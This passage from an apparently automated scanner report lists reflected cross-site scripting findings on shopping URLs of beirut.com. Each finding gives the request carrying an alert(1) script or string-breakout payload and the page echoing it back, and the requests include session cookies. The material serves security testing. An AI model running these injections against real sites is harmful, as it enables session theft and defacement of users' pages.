User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:54:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping657c8'-alert(1)-'879671d9669/Equipment-Gadgets/339412286/Mobile-Phones/55';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.952. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0a2f<script>alert(1)</script>a7b6b47792c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Equipment-Gadgetsa0a2f<script>alert(1)</script>a7b6b47792c/339412286/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:01:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Equipment Gadgetsa0a2f<script>alert(1)</script>a7b6b47792c <a href="#" id="backlink">
...[SNIP]...

4.953. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d935'-alert(1)-'b97ae07adf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets9d935'-alert(1)-'b97ae07adf5/339412286/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:01:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Equipment-Gadgets9d935'-alert(1)-'b97ae07adf5/339412286/Mobile-Phones/55';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.954. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9924'-alert(1)-'bccb86718fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/339412286d9924'-alert(1)-'bccb86718fb/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:08:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgets/339412286d9924'-alert(1)-'bccb86718fb/Mobile-Phones/55';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.955. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd851'-alert(1)-'40b90556b76 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/339412286/Mobile-Phonesbd851'-alert(1)-'40b90556b76/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:14:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Equipment-Gadgets/339412286/Mobile-Phonesbd851'-alert(1)-'40b90556b76/55';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.956. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a104'-alert(1)-'03a1f3b248a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/559a104'-alert(1)-'03a1f3b248a HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Equipment-Gadgets/339412286/Mobile-Phones/559a104'-alert(1)-'03a1f3b248a';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.957. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcbba"><a>82e9685ba07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingfcbba"><a>82e9685ba07/Equipment-Gadgets/339412286/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:41:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingfcbba"><a>82e9685ba07">
...[SNIP]...

4.958. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7c0'-alert(1)-'306c1730b13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping4f7c0'-alert(1)-'306c1730b13/Equipment-Gadgets/339412286/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping4f7c0'-alert(1)-'306c1730b13/Equipment-Gadgets/339412286/Musical-Instruments/24';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.959. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 801e4'-alert(1)-'6a9e89cfa94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets801e4'-alert(1)-'6a9e89cfa94/339412286/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:53:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Equipment-Gadgets801e4'-alert(1)-'6a9e89cfa94/339412286/Musical-Instruments/24';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.960. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1591d<script>alert(1)</script>2f814d77927 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Equipment-Gadgets1591d<script>alert(1)</script>2f814d77927/339412286/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:54:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Equipment Gadgets1591d<script>alert(1)</script>2f814d77927 <a href="#" id="backlink">
...[SNIP]...

4.961. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7a9b'-alert(1)-'201bdf3a8f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/339412286c7a9b'-alert(1)-'201bdf3a8f7/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:58:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Equipment-Gadgets/339412286c7a9b'-alert(1)-'201bdf3a8f7/Musical-Instruments/24';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.962. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b07bc'-alert(1)-'9eff71d71b3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/339412286/Musical-Instrumentsb07bc'-alert(1)-'9eff71d71b3/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:05:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Equipment-Gadgets/339412286/Musical-Instrumentsb07bc'-alert(1)-'9eff71d71b3/24';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.963. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7d43'-alert(1)-'d0a31ab47d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24f7d43'-alert(1)-'d0a31ab47d6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:14:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24f7d43'-alert(1)-'d0a31ab47d6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.964. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64df5"><a>b0140b06081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping64df5"><a>b0140b06081/Equipment-Gadgets/339412286/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
